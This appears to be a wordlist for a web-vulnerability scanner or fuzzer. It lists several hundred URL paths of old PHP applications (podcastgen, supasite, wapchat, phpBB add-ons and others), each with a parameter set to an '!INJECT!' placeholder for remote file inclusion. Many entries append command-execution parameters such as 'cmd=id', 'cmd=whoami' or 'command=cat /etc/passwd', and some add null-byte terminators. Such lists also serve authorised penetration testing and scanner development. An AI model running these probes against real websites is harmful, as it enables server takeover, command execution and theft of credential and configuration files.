-/plugins/widgets/htmledit/htmledit.php?_POWL[installPath]=!INJECT!
-/plume-1.1.3/manager/tools/link/dbinstall.php?cmd=ls&_PX_config[manager_path]=!INJECT!
-/plus.php?_pages_dir=!INJECT!?
-/pmapper-3.2-beta3/incphp/globals.php?_SESSION[PM_INCPHP]=!INJECT!?
-/pmi_v28/Includes/global.inc.php?strIncludePrefix=!INJECT!
-/pmi_v28/Includes/global.inc.php?strIncludePrefix=!INJECT!?
-/podcastgen1.0beta2/components/xmlparser/loadparser.php?absoluteurl=!INJECT!
-/podcastgen1.0beta2/core/admin/admin.php?p=admin&absoluteurl=!INJECT!
-/podcastgen1.0beta2/core/admin/categories.php?categoriesenabled=yes&do=categories&action=del&absoluteurl=!INJECT!
-/podcastgen1.0beta2/core/admin/categories_add.php?absoluteurl=!INJECT!
-/podcastgen1.0beta2/core/admin/categories_remove.php?absoluteurl=!INJECT!
-/podcastgen1.0beta2/core/admin/edit.php?p=admin&do=edit&c=ok&absoluteurl=!INJECT!
-/podcastgen1.0beta2/core/admin/editdel.php?p=admin&absoluteurl=!INJECT!
-/podcastgen1.0beta2/core/admin/ftpfeature.php?p=admin&absoluteurl=!INJECT!
-/podcastgen1.0beta2/core/admin/login.php?absoluteurl=!INJECT!
-/podcastgen1.0beta2/core/admin/pgRSSnews.php?absoluteurl=!INJECT!
-/podcastgen1.0beta2/core/admin/showcat.php?absoluteurl=!INJECT!
-/podcastgen1.0beta2/core/admin/upload.php?p=admin&do=upload&c=ok&absoluteurl=!INJECT!
-/podcastgen1.0beta2/core/archive_cat.php?absoluteurl=!INJECT!
-/podcastgen1.0beta2/core/archive_nocat.php?absoluteurl=!INJECT!
-/podcastgen1.0beta2/core/recent_list.php?absoluteurl=!INJECT!
-/poll/view.php?int_path=!INJECT!
-/pollvote.php?pollname=!INJECT!?&cmd=ls
-/pop.php?base=!INJECT!
-/popup_window.php?site_isp_root=!INJECT!?
-/port.php?content=!INJECT!
-/portal/includes/portal_block.php?phpbb_root_path=!INJECT!
-/portal/portal.php?phpbb_root_path=!INJECT!?
-/portfolio.php?id=!INJECT!
-/portfolio/commentaires/derniers_commentaires.php?rep=!INJECT!?
-/post_static_0-11/_lib/fckeditor/upload_config.php?DDS=!INJECT!
-/prepare.php?xcart_dir=!INJECT!?
-/prepend.php?_PX_config[manager_path]=!INJECT!
-/preview.php?php_script_path=!INJECT!?&cmd=dir
-/principal.php?conteudo=!INJECT!
-/print.php?page=!INJECT!
-/print.php?pager=!INJECT!
-/print.php?print=!INJECT!?
-/process.php?DEFAULT_SKIN=!INJECT!
-/professeurs/index.php?repertoire_config=!INJECT!
-/profil.php?config[root_ordner]=!INJECT!?&cmd=id
-/projects/weatimages/demo/index.php?ini[langpack]=!INJECT!
-/promocms/newspublish/include.php?path[bdocroot]=!INJECT!
-/protection.php?logout_page=!INJECT!?
-/provider/auth.php?xcart_dir=!INJECT!?
-/psynch/nph-psa.exe?css=!INJECT!
-/psynch/nph-psf.exe?css=!INJECT!
-/public_html/add-ons/modules/sysmanager/plugins/install.plugin.php?AURORA_MODULES_FOLDER=!INJECT!?
-/public_html/modules/Forums/favorites.php?nuke_bb_root_path=!INJECT!?
-/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=!INJECT!
-/public_includes/pub_popup/popup_finduser.php?vsDragonRootPath=!INJECT!
-/qsgen_0.7.2c/qlib/smarty.inc.php?CONFIG[gameroot]=!INJECT!?
-/qsgen_0.7.2c/server_request.php?CONFIG[gameroot]=!INJECT!?
-/qte_web.php?qte_web_path=!INJECT!?
-/quick_reply.php?phpbb_root_path=!INJECT!&mode=[file]
-/quickie.php?QUICK_PATH=!INJECT!?&cmd=id
-/random2.php?path_to_folder=!INJECT!
-/randshop/index.php?incl=!INJECT!?
-/rdf.php?page[path]=!INJECT!?&cmd=ls
-/reactivate.php?base_dir=!INJECT!
-/read.php?data=!INJECT!?
-/readmore.php?config["sipssys"]=!INJECT!
-/recent.php?insPath=!INJECT!
-/rechnung.php?_PHPLIB[libdir]=!INJECT!?
-/reconfig.php?GLOBALS[CLPath]=!INJECT!
-/redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=!INJECT!
-/redirect.php?url=!INJECT!
-/redsys/404.php?REDSYS[MYPATH][TEMPLATES]=!INJECT!
-/register.php?base_dir=!INJECT!
-/releasenote.php?mosConfig_absolute_path=!INJECT!
-/rempass.php?lang=!INJECT!
-/report.php?scriptpath=!INJECT!?
-/reports/who_r.php?bj=!INJECT!
-/resources/includes/class.Smarty.php?cfg[sys][base_path]=!INJECT!
-/ressourcen/dbopen.php?home=!INJECT!?
-/robotstats.inc.php?DOCUMENT_ROOT=!INJECT!?
-/root/public/code/cp_html2txt.php?page=!INJECT!
-/routines/fieldValidation.php?jssShopFileSystem=!INJECT!
-/rspa/framework/Controller_v4.php?__ClassPath=!INJECT!
-/rspa/framework/Controller_v4.php?__ClassPath=!INJECT!?
-/rspa/framework/Controller_v5.php?__IncludeFilePHPClass=!INJECT!
-/rspa/framework/Controller_v5.php?__IncludeFilePHPClass=!INJECT!?
-/rss.php?page[path]=!INJECT!?&cmd=ls
-/rss.php?phpraid_dir=!INJECT!
-/rss.php?premodDir=!INJECT!
-/rss2.php?page[path]=!INJECT!?&cmd=ls
-/run.php?dir=SHELL?&file=!INJECT!
-/s01.php?shopid=!INJECT!
-/s01.php?shopid=!INJECT!?
-/s02.php?shopid=!INJECT!?
-/s03.php?shopid=!INJECT!?
-/s04.php?shopid=!INJECT!?
-/sablonlar/gunaysoft/gunaysoft.php?icerikyolu=!INJECT!
-/sablonlar/gunaysoft/gunaysoft.php?sayfaid=!INJECT!
-/saf/lib/PEAR/PhpDocumentor/Documentation/tests/559668.php?FORUM[LIB]=!INJECT!
-/saf/lib/PEAR/PhpDocumentor/Documentation/tests/559668.php?FORUM[LIB]=!INJECT!?
-/sample/xls2mysql/parser_path=!INJECT!?
-/save.php?file_save=!INJECT!
-/saveserver.php?thisdir=!INJECT!
-/script//ident/index.php?path_inc=!INJECT!
-/script/_conf/core/common-tpl-vars.php?confdir=!INJECT!?
-/script/common.inc.php?path_inc=!INJECT!
-/script/gestion/index.php?path_inc=!INJECT!
-/script/ident/disconnect.php?path_inc=!INJECT!
-/script/ident/ident.inc.php?path_inc=!INJECT!
-/script/ident/identification.php?path_inc=!INJECT!
-/script/ident/loginliste.php?path_inc=!INJECT!
-/script/ident/loginmodif.php?path_inc=!INJECT!
-/script/index.php?path_inc=!INJECT!
-/script/init/createallimagecache.php?PATH_TO_CODE=!INJECT!
-/script/menu/menuadministration.php?path_inc=!INJECT!
-/script/menu/menuprincipal.php?path_inc=!INJECT!
-/script/param/param.inc.php?path_inc=!INJECT!
-/script/plugins/phpgacl/admin/index.php?path_inc=!INJECT!
-/script/template/index.php?main_page_directory=!INJECT!
-/script/tick/allincludefortick.php?PATH_TO_CODE=!INJECT!
-/script/tick/test.php?PATH_TO_CODE=!INJECT!
-/script_path/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=!INJECT!?
-/script_path/cms/classes/openengine/filepool.php?oe_classpath=!INJECT!?
-/script_path/installation/index.php?mosConfig_absolute_path=!INJECT!?
-/script_path/pgvnuke/pgvindex.php?DOCUMENT_ROOT/header.php=!INJECT!
-/scripts/check-lom.php?ETCDIR=!INJECT!
-/scripts/gallery.scr.php?GLOBALS[PTH][func]=!INJECT!?
-/scripts/lom_update.php?ETCDIR=!INJECT!
-/scripts/news.scr.php?GLOBALS[PTH][classes]=!INJECT!?
-/scripts/polls.scr.php?GLOBALS[PTH][classes]=!INJECT!?
-/scripts/rss.scr.php?GLOBALS[PTH][classes]=!INJECT!?
-/scripts/search.scr.php?GLOBALS[PTH][classes]=!INJECT!?
-/scripts/sitemap.scr.php?GLOBALS[PTH][classes]=!INJECT!
-/scripts/sitemap.scr.php?GLOBALS[PTH][classes]=!INJECT!?
-/scripts/weigh_keywords.php?ETCDIR=!INJECT!
-/scripts/xtextarea.scr.php?GLOBALS[PTH][spaw]=!INJECT!?
-/search.php?config["sipssys"]=!INJECT!
-/search.php?id=!INJECT!
-/search.php?insPath=!INJECT!
-/search/submit.php?config["sipssys"]=!INJECT!
-/search_wA.php?LIBPATH=!INJECT!
-/searchbot.php?path=!INJECT!
-/security/include/_class.security.php?PHPSECURITYADMIN_PATH=!INJECT!
-/sendstudio/admin/includes/createemails.inc.php?ROOTDIR=!INJECT!?
-/sendstudio/admin/includes/send_emails.inc.php?ROOTDIR=!INJECT!?
-/senetman/html/index.php?page=!INJECT!
-/services.php?page=!INJECT!
-/services/samples/inclusionService.php?CabronServiceFolder=!INJECT!%00
-/settings.php?P[includes]=!INJECT!
-/settings_sql.php?path=!INJECT!
-/setup/inc/database.php?tcms_administer_site=!INJECT!
-/setup/upgrader.php?RootDirectory=!INJECT!
-/sezhoo/SezHooTabsAndActions.php?IP=!INJECT!
-/shop/includes/header.inc.php?dateiPfad=!INJECT!
-/shop/index.php?action=!INJECT!?&cmd=cat%20config.php
-/shop/page.php?osCsid=!INJECT!?
-/shop/page.php?pageid=!INJECT!?
-/shoutbox.php?language=!INJECT!
-/shoutbox.php?root=!INJECT!?cmd=id
-/show.php?file=!INJECT!
-/show.php?id=!INJECT!
-/show.php?page=!INJECT!
-/show.php?path=!INJECT!
-/show_archives.php?cutepath=!INJECT!?
-/sid=XXXXXXXXXXXXXXXXXXXXXXXXXXXX&shopid=!INJECT!
-/sid=!INJECT!
-/signer/final.php?smiley=!INJECT!?
-/signin.php?sent=1&AMG_serverpath=!INJECT!
-/sinagb.php?fuss=!INJECT!
-/sinapis.php?fuss=!INJECT!
-/sitebar/Integrator.php?file=!INJECT!
-/sitebar/index.php?writerFile=!INJECT!
-/sitebuilder/admin/top.php?admindir=!INJECT!
-/sitemap.xml.php?dir[classes]=!INJECT!
-/skin/board/default/doctype.php?dir=!INJECT!
-/skin/dark/template.php?path=!INJECT!
-/skin/gold/template.php?path=!INJECT!
-/skin/html/table.php?pachtofile=!INJECT!
-/skin/original/template.php?path=!INJECT!
-/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=!INJECT!
-/skins/advanced/advanced1.php?pluginpath[0]=!INJECT!
-/skins/default.php?dir_inc=!INJECT!
-/skins/header.php?ote_home=!INJECT!
-/skins/phpchess/layout_admin_cfg.php?Root_Path=!INJECT!
-/skins/phpchess/layout_cfg.php?Root_Path=!INJECT!
-/skins/phpchess/layout_t_top.php?Root_Path=!INJECT!
-/skysilver/login.tpl.php?theme=!INJECT!?
-/slogin_lib.inc.php?slogin_path=!INJECT!?
-/smarty.php?xcart_dir=!INJECT!?
-/smarty/smarty_class.php?_smarty_compile_path=!INJECT!
-/smilies.php?config=!INJECT!
-/snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=!INJECT!?
-/snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=!INJECT!?
-/snort/base_stat_common.php?BASE_path=!INJECT!
-/social_game_play.php?path=!INJECT!?
-/software_upload/public_includes/pub_templates/vphptree/template.php?vsDragonRootPath=!INJECT!
-/song.php?phpbb_root_path=!INJECT!
-/source.php?bibtexrootrel=!INJECT!?
-/source/mod/rss/channeledit.php?Codebase=!INJECT!
-/source/mod/rss/post.php?Codebase=!INJECT!
-/source/mod/rss/view.php?Codebase=!INJECT!
-/source/mod/rss/viewitem.php?Codebase=!INJECT!
-/sources/Admin/admin_cats.php?CONFIG[main_path]=!INJECT!
-/sources/Admin/admin_edit.php?CONFIG[main_path]=!INJECT!
-/sources/Admin/admin_import.php?CONFIG[main_path]=!INJECT!
-/sources/Admin/admin_templates.php?CONFIG[main_path]=!INJECT!
-/sources/functions.php?CONFIG[main_path]=!INJECT!
-/sources/help.php?CONFIG[main_path]=!INJECT!
-/sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]=!INJECT!
-/sources/lostpw.php?FORM[set]=1&FORM[session_id]=1&CONFIG[path]=!INJECT!
-/sources/mail.php?CONFIG[main_path]=!INJECT!
-/sources/misc/new_day.php?path=!INJECT!
-/sources/news.php?CONFIG[main_path]=!INJECT!
-/sources/post.php?fil_config=!INJECT!
-/sources/template.php?CONFIG[main_path]=!INJECT!
-/sources/tourney/index.php?page=!INJECT!?
-/spaw/spaw_control.class.php?GLOBALS[spaw_root]=!INJECT!
-/spaw/spaw_control.class.php?spaw_root=!INJECT!
-/speedberg/include/entrancePage.tpl.php?SPEEDBERG_PATH=!INJECT!
-/speedberg/include/generalToolBox.tlb.php?SPEEDBERG_PATH=!INJECT!
-/speedberg/include/myToolBox.tlb.php?SPEEDBERG_PATH=!INJECT!
-/speedberg/include/scriplet.inc.php?SPEEDBERG_PATH=!INJECT!
-/speedberg/include/simplePage.tpl.php?SPEEDBERG_PATH=!INJECT!
-/speedberg/include/speedberg.class.php?SPEEDBERG_PATH=!INJECT!
-/speedberg/include/standardPage.tpl.php?SPEEDBERG_PATH=!INJECT!
-/spellcheckwindowframeset.php?SpellIncPath=!INJECT!
-/squirrelcart/cart_content.php?cart_isp_root=!INJECT!
-/src/ark_inc.php?cfg_pear_path=!INJECT!?
-/src/browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=!INJECT!
-/src/scripture.php?pageHeaderFile=!INJECT!?
-/starnet/themes/c-sky/main.inc.php?cmsdir=!INJECT!?
-/start.php?lang=!INJECT!
-/start.php?pg=!INJECT!
-/stat_modules/users_age/module.php?phpbb_root_path=!INJECT!
-/stats.php?vwar_root=!INJECT!
-/stphpapplication.php?STPHPLIB_DIR=!INJECT!
-/stphpbtnimage.php?STPHPLIB_DIR=!INJECT!
-/stphpform.php?STPHPLIB_DIR=!INJECT!
-/str.php?p=!INJECT!
-/streamline-1.0-beta4/src/core/theme/includes/account_footer.php?sl_theme_unix_path=!INJECT!
-/streamline-1.0-beta4/src/core/theme/includes/account_footer.php?sl_theme_unix_path=!INJECT!?
-/strload.php?LangFile=!INJECT!
-/studip-1.3.0-2/studip-htdocs/archiv_assi.php?cmd=ls%20-al&ABSOLUTE_PATH_STUDIP=!INJECT!?
-/studip-1.3.0-2/studip-phplib/oohforms.inc?cmd=ls%20-al&_PHPLIB[libdir]=!INJECT!?
-/styles.php?toroot=!INJECT!
-/styles/default/global_header.php?installed=23&domain=!INJECT!
-/submit_abuse.php?path_prefix=!INJECT!
-/submit_comment.php?path_prefix=!INJECT!
-/subscp.php?phpbb_root_path=!INJECT!?
-/suite/index.php?pg=!INJECT!?
-/supasite/admin_auth_cookies.php?supa[db_path]=!INJECT!
-/supasite/admin_mods.php?supa[db_path]=!INJECT!
-/supasite/admin_news.php?supa[db_path]=!INJECT!
-/supasite/admin_settings.php?supa[include_path]=!INJECT!
-/supasite/admin_topics.php?supa[db_path]=!INJECT!
-/supasite/admin_users.php?supa[db_path]=!INJECT!
-/supasite/admin_utilities.php?supa[db_path]=!INJECT!
-/supasite/backend_site.php?supa[include_path]=!INJECT!
-/supasite/common_functions.php?supa[db_path]=!INJECT!
-/supasite/site_comment.php?supa[db_path]=!INJECT!
-/supasite/site_news.php?supa[db_path]=!INJECT!
-/support/include/open_form.php?include_dir=!INJECT!?cmd=pwd
-/support/index.php?main=!INJECT!
-/surveys/survey.inc.php?path=!INJECT!
-/sw/lib_comment/comment.php?doc_directory=!INJECT!?
-/sw/lib_find/find.php?doc_directory=!INJECT!?
-/sw/lib_session/session.php?doc_directory=!INJECT!?
-/sw/lib_up_file/file.php?doc_directory=!INJECT!?
-/sw/lib_up_file/find_file.php?doc_directory=!INJECT!?
-/sw/lib_user/find_user.php?doc_directory=!INJECT!?
-/sw/lib_user/user.php?doc_directory=!INJECT!?
-/sys/code/box.inc.php?config["sipssys"]=!INJECT!
-/system/ImageImageMagick.php?glConf[path_system]=!INJECT!?
-/system/_b/contentFiles/gBIndex.php?gBRootPath=!INJECT!?
-/system/admin/include/item_main.php?GLOBALS=!INJECT!
-/system/admin/include/upload_form.php?GLOBALS=!INJECT!
-/system/command/admin.cmd.php?GLOBALS=!INJECT!
-/system/command/download.cmd.php?GLOBALS=!INJECT!
-/system/funcs/xkurl.php?PEARPATH=!INJECT!
-/system/includes/pageheaderdefault.inc.php?_sysSessionPath=!INJECT!
-/system/login.php?site_path=!INJECT!
-/tagit2b/tagmin/delTagUser.php?configpath=!INJECT!?
-/tags.php?BBCodeFile=!INJECT!
-/taxonservice.php?dir=!INJECT!?
-/teatro/pub/pub08_comments.php?basePath=!INJECT!
-/technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=!INJECT!?
-/template.php?actionsPage=!INJECT!?
-/template.php?blog_theme=!INJECT!
-/template.php?pagina=!INJECT!
-/template/Noir/index.php?site_path=!INJECT!
-/template/Vert/index.php?pageAll=!INJECT!
-/template/Vert/index.php?site_path=!INJECT!
-/template/barnraiser_01/p_new_password.tpl.php?templatePath=!INJECT!
-/template/default/footer.php?ROOT_PATH=!INJECT!?cmd=ls
-/template/default/test/header.php?ROOT_PATH=!INJECT!?cmd=ls
-/template/gwb/user_bottom.php?config[template_path]=!INJECT!
-/template/purpletech/base_include.php?page=!INJECT!?
-/template/rwb/user_bottom.php?config[template_path]=!INJECT!
-/template_csv.php?rInfo[content]=!INJECT!
-/templates/2blue/bodyTemplate.php?serverPath=!INJECT!?
-/templates/Official/part_userprofile.php?template_path=!INJECT!
-/templates/barrel/template.tpl.php?renderer=!INJECT!
-/templates/barrel/template.tpl.php?renderer=!INJECT!?
-/templates/barry/template.tpl.php?renderer=!INJECT!
-/templates/be2004-2/index.php?mosConfig_absolute_path=!INJECT!
-/templates/datumVonDatumBis.inc.php?root=!INJECT!
-/templates/default/header.inc.php?menu=!INJECT!
-/templates/default/index_logged.php?main_loaded=1&cur_module=!INJECT!
-/templates/default/tpl_message.php?right_file=!INJECT!
-/templates/footer.inc.php?root=!INJECT!
-/templates/header.inc.php?root=!INJECT!
-/templates/mylook/template.tpl.php?renderer=!INJECT!
-/templates/oerdec/template.tpl.php?renderer=!INJECT!
-/templates/pb/language/lang_nl.php?temppath=!INJECT!
-/templates/penguin/template.tpl.php?renderer=!INJECT!
-/templates/sidebar/template.tpl.php?renderer=!INJECT!
-/templates/slashdot/template.tpl.php?renderer=!INJECT!
-/templates/stylesheets.php?root=!INJECT!
-/templates/text-only/template.tpl.php?renderer=!INJECT!
-/templates/tmpl_dfl/scripts/index.php?dir[inc]=!INJECT!
-/theme/breadcrumb.php?rootBase=!INJECT!?
-/theme/default.php?root=!INJECT!
-/theme/format.php?_page_content=!INJECT!?
-/theme/format.php?_page_css=!INJECT!?
-/theme/frames1.php?root=!INJECT!
-/theme/frames1_center.php?root=!INJECT!
-/theme/frames1_left.php?root=!INJECT!
-/theme/frames1_top.php?root=!INJECT!
-/theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=!INJECT!
-/theme/settings.php?pfad_z=!INJECT!
-/theme/test1.php?root=!INJECT!
-/theme/test2.php?root=!INJECT!
-/theme/test3.php?root=!INJECT!
-/theme/test4.php?root=!INJECT!
-/theme/test5.php?root=!INJECT!
-/theme/test6.php?root=!INJECT!
-/themes.php?GLOBALS[theme_path]=!INJECT!?
-/themes/blackorange.php?root=!INJECT!
-/themes/container.php?theme_directory=!INJECT!%00
-/themes/default/layouts/standard.php?page_include=!INJECT!?&act=cmd&cmd=whoami&d=/&submit=1&cmd_txt=1
-/themes/default/preview_post_completo.php?dir=!INJECT!
-/themes/header.php?theme_directory=!INJECT!%00
-/themes/ubb/login.php?theme=!INJECT!
-/themes/ubb/login.php?theme=!INJECT!?
-/thumbnail.php?module=gallery&GLOBALS[PTH][classes]=!INJECT!
-/tikiwiki/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.phpinfo()&t=png&title=!INJECT!
-/timedifference.php?la=!INJECT!
-/toolbar.loudmouth.php?mainframe=!INJECT!
-/tools/update_translations.php?_SESSION[path]=!INJECT!?
-/top.php?laypath=!INJECT!
-/toplist.php?f=toplist_top10&phpbb_root_path=!INJECT!
-/topsites/index.php?page=!INJECT!?&
-/towels-0.1/src/scripture.php?pageHeaderFile=!INJECT!
-/track.php?path=!INJECT!
-/tsep/include/colorswitch.php?tsep_config[absPath]=!INJECT!?
-/ttCMS_path/lib/db/ez_sql.php?lib_path=!INJECT!
-/twebs/modules/misc/usermods.php?ROOT=!INJECT!
-/ubbt.inc.php?GLOBALS[thispath]=!INJECT!?
-/unavailable.php?bibtexrootrel=!INJECT!?
-/unsubs.php?scdir=!INJECT!
-/up.php?my[root]=!INJECT!
-/upload.php?save_path=!INJECT!?
-/upload/admin/frontpage_right.php?loadadminpage=!INJECT!?
-/upload/top.php?maindir=!INJECT!?
-/upload/xax/admin/modules/install_module.php?level=!INJECT!?
-/upload/xax/admin/patch/index.php?level=!INJECT!?
-/upload/xax/ossigeno/admin/install_module.php?level=!INJECT!?
-/upload/xax/ossigeno/admin/uninstall_module.php?level=!INJECT!?
-/upload_local.php?target=!INJECT!?
-/upload_multi.php?target=!INJECT!?
-/urlinn_includes/config.php?dir_ws=!INJECT!?
-/user.php?caselist[bad_file.txt][path]=!INJECT!&command=cat%20/etc/passwd
-/user_language.php?INDM=r3d.w0rm&language_dir=!INJECT!?
-/user_new_2.php?home=!INJECT!
-/usr/extensions/get_calendar.inc.php?root_path=!INJECT!
-/usr/extensions/get_infochannel.inc.php?root_path=!INJECT!?cmd=id;pwd
-/usr/extensions/get_tree.inc.php?GLOBALS[root_path]=!INJECT!
-/utilitaires/gestion_sondage.php?repertoire_visiteur=!INJECT!
-/utils/class_HTTPRetriever.php?libcurlemuinc=!INJECT!
-/v-webmail/includes/mailaccess/pop3.php?CONFIG[pear_dir]=!INJECT!
-/vCard/admin/define.inc.php?match=!INJECT!?&cmd=id
-/vb/includes/functions.php?classfile=!INJECT!
-/vb/includes/functions_cron.php?nextitem=!INJECT!
-/vb/includes/functions_forumdisplay.php?specialtemplates=!INJECT!
-/vbgsitemap/vbgsitemap-config.php?base=!INJECT!
-/vbgsitemap/vbgsitemap-vbseo.php?base=!INJECT!
-/vedit/editor/edit_htmlarea.php?highlighter=!INJECT!?
-/viart_cms-3.3.2/blocks/block_site_map.php?root_folder_path=!INJECT!?
-/view.php?ariadne=!INJECT!?
-/view.php?id=!INJECT!
-/view_func.php?i=!INJECT!&l=testfile.txt?
-/views/print/printbar.php?views_path=!INJECT!
-/visible_count_inc.php?statitpath=!INJECT!
-/visitor.php?_SERVER[DOCUMENT_ROOT]=!INJECT!??
-/volume.php?config[public_dir]=!INJECT!?
-/vote.php?Madoa=!INJECT!?
-/votebox.php?VoteBoxPath=!INJECT!
-/vp/configure.php?phpbb_root_path=!INJECT!?
-/vwebmail/includes/mailaccess/pop3/core.php?CONFIG[pear_dir]=!INJECT!
-/w-agora_path/add_user.php?bn_dir_default=!INJECT!?
-/w-agora_path/create_forum.php?bn_dir_default=!INJECT!?
-/w-agora_path/create_user.php?bn_dir_default=!INJECT!?
-/w-agora_path/delete_notes.php?bn_dir_default=!INJECT!?
-/w-agora_path/delete_user.php?bn_dir_default=!INJECT!?
-/w-agora_path/edit_forum.php?bn_dir_default=!INJECT!?
-/w-agora_path/mail_users.php?bn_dir_default=!INJECT!?
-/w-agora_path/moderate_notes.php?bn_dir_default=!INJECT!?
-/w-agora_path/reorder_forums.php?bn_dir_default=!INJECT!?
-/wamp_dir/setup/yesno.phtml?no_url=!INJECT!?
-/wapchat/src/eng.adCreate.php?sysFileDir=!INJECT!
-/wapchat/src/eng.adCreateSave.php?sysFileDir=!INJECT!
-/wapchat/src/eng.adDispByTypeOptions.php?sysFileDir=!INJECT!
-/wapchat/src/eng.createRoom.php?sysFileDir=!INJECT!
-/wapchat/src/eng.forward.php?sysFileDir=!INJECT!
-/wapchat/src/eng.pageLogout.php?sysFileDir=!INJECT!
-/wapchat/src/eng.resultMember.php?sysFileDir=!INJECT!
-/wapchat/src/eng.roomDeleteConfirm.php?sysFileDir=!INJECT!
-/wapchat/src/eng.saveNewRoom.php?sysFileDir=!INJECT!
-/wapchat/src/eng.searchMember.php?sysFileDir=!INJECT!
-/wapchat/src/eng.writeMsg.php?sysFileDir=!INJECT!
-/war.php?vwar_root=!INJECT!
-/warn.php?file=!INJECT!
-/watermark.php?GALLERY_BASEDIR=!INJECT!
-/wbxml/WBXML/Decoder.php?base_dir=!INJECT!
-/wbxml/WBXML/Encoder.php?base_dir=!INJECT!
-/web/Administration/Includes/configureText.php?path_prefix=!INJECT!
-/web/Administration/Includes/contentHome.php?path_prefix=!INJECT!
-/web/Administration/Includes/deleteContent.php?path_prefix=!INJECT!
-/web/Administration/Includes/deleteUser.php?path_prefix=!INJECT!
-/web/Administration/Includes/userHome.php?path_prefix=!INJECT!
-/web/BetaBlockModules//Module/Module.php?path_prefix=!INJECT!
-/web/BetaBlockModules/AboutUserModule/AboutUserModule.php?path_prefix=!INJECT!
-/web/BetaBlockModules/AddGroupModule/AddGroupModule.php?path_prefix=!INJECT!
-/web/BetaBlockModules/AddMessageModule/AddMessageModule.php?path_prefix=!INJECT!
-/web/BetaBlockModules/AudiosMediaGalleryModule/AudiosMediaGalleryModule.php?current_blockmodule_path!INJECT!
-/web/BetaBlockModules/CustomizeUIModule/desktop_image.php?path_prefix=!INJECT!
-/web/BetaBlockModules/EditProfileModule/DynamicProfile.php?path_prefix=!INJECT!
-/web/BetaBlockModules/EditProfileModule/external.php?path_prefix=!INJECT!
-/web/BetaBlockModules/EnableModule/EnableModule.php?path_prefix=!INJECT!
-/web/BetaBlockModules/ExternalFeedModule/ExternalFeedModule.php?path_prefix=!INJECT!
-/web/BetaBlockModules/FlickrModule/FlickrModule.php?path_prefix=!INJECT!
-/web/BetaBlockModules/GroupForumModule/GroupForumModule.php?path_prefix!INJECT!
-/web/BetaBlockModules/GroupForumPermalinkModule/GroupForumPermalinkModule.php?path_prefix=!INJECT!
-/web/BetaBlockModules/GroupModerateContentModule/GroupModerateContentModule.php?path_prefix=!INJECT!
-/web/BetaBlockModules/GroupModerateUserModule/GroupModerateUserModule.php?path_prefix=!INJECT!
-/web/BetaBlockModules/GroupModerationModule/GroupModerationModule.php?path_prefix=!INJECT!
-/web/BetaBlockModules/GroupsCategoryModule/GroupsCategoryModule.php?path_prefix=!INJECT!
-/web/BetaBlockModules/GroupsDirectoryModule/GroupsDirectoryModule.php?path_prefix=!INJECT!
-/web/BetaBlockModules/ImagesMediaGalleryModule/ImagesMediaGalleryModule.php?current_blockmodule_path!INJECT!
-/web/BetaBlockModules/ImagesModule/ImagesModule.php?path_prefix=!INJECT!
-/web/BetaBlockModules/InvitationStatusModule/InvitationStatusModule.php?path_prefix=!INJECT!
-/web/BetaBlockModules/LargestGroupsModule/LargestGroupsModule.php?path_prefix=!INJECT!
-/web/BetaBlockModules/LinksModule/LinksModule.php?path_prefix=!INJECT!
-/web/BetaBlockModules/LoginModule/remoteauth_functions.php?path_prefix=!INJECT!
-/web/BetaBlockModules/LogoModule/LogoModule.php?path_prefix=!INJECT!
-/web/BetaBlockModules/MediaFullViewModule/MediaFullViewModule.php?path_prefix=!INJECT!
-/web/BetaBlockModules/MediaManagementModule/MediaManagementModule.php?path_prefix=!INJECT!
-/web/BetaBlockModules/MembersFacewallModule/MembersFacewallModule.php?current_blockmodule_path!INJECT!
-/web/BetaBlockModules/MessageModule/MessageModule.php?path_prefix=!INJECT!
-/web/BetaBlockModules/ModuleSelectorModule/ModuleSelectorModule.php?path_prefix=!INJECT!
-/web/BetaBlockModules/MyGroupsModule/MyGroupsModule.php?path_prefix=!INJECT!
-/web/BetaBlockModules/MyLinksModule/MyLinksModule.php?path_prefix=!INJECT!
-/web/BetaBlockModules/MyNetworksModule.php?path_prefix=!INJECT!
-/web/BetaBlockModules/NetworkAnnouncementModule/NetworkAnnouncementModule.php?path_prefix=!INJECT!
-/web/BetaBlockModules/NetworkDefaultControlModule/NetworkDefaultControlModule.php?path_prefix=!INJECT!
-/web/BetaBlockModules/NetworkDefaultLinksModule/NetworkDefaultLinksModule.php?path_prefix=!INJECT!
-/web/BetaBlockModules/NetworkModerateUserModule/NetworkModerateUserModule.php?path_prefix=!INJECT!
-/web/BetaBlockModules/NetworkResultContentModule/NetworkResultContentModule.php?path_prefix=!INJECT!
-/web/BetaBlockModules/NetworkResultUserModule/NetworkResultUserModule.php?path_prefix=!INJECT!
-/web/BetaBlockModules/NetworksDirectoryModule/NetworksDirectoryModule.php?path_prefix=!INJECT!
-/web/BetaBlockModules/NewestGroupsModule/NewestGroupsModule.php?current_blockmodule_path!INJECT!
-/web/BetaBlockModules/PeopleModule/PeopleModule.php?path_prefix=!INJECT!
-/web/BetaBlockModules/PopularTagsModule/PopularTagsModule.php?path_prefix=!INJECT!
-/web/BetaBlockModules/PostContentModule/PostContentModule.php?path_prefix=!INJECT!
-/web/BetaBlockModules/ProfileFeedModule/ProfileFeedModule.php?path_prefix=!INJECT!
-/web/BetaBlockModules/RecentCommentsModule/RecentCommentsModule.php?path_prefix=!INJECT!
-/web/BetaBlockModules/RecentPostModule/RecentPostModule.php?path_prefix=!INJECT!
-/web/BetaBlockModules/RecentTagsModule/RecentTagsModule.php?path_prefix=!INJECT!
-/web/BetaBlockModules/RegisterModule/RegisterModule.php?path_prefix=!INJECT!
-/web/BetaBlockModules/SearchGroupsModule/SearchGroupsModule.php?path_prefix=!INJECT!
-/web/BetaBlockModules/ShowAnnouncementModule/ShowAnnouncementModule.php?path_prefix=!INJECT!
-/web/BetaBlockModules/ShowContentModule/ShowContentModule.php?path_prefix=!INJECT!
-/web/BetaBlockModules/TakerATourModule/TakerATourModule.php?path_prefix=!INJECT!
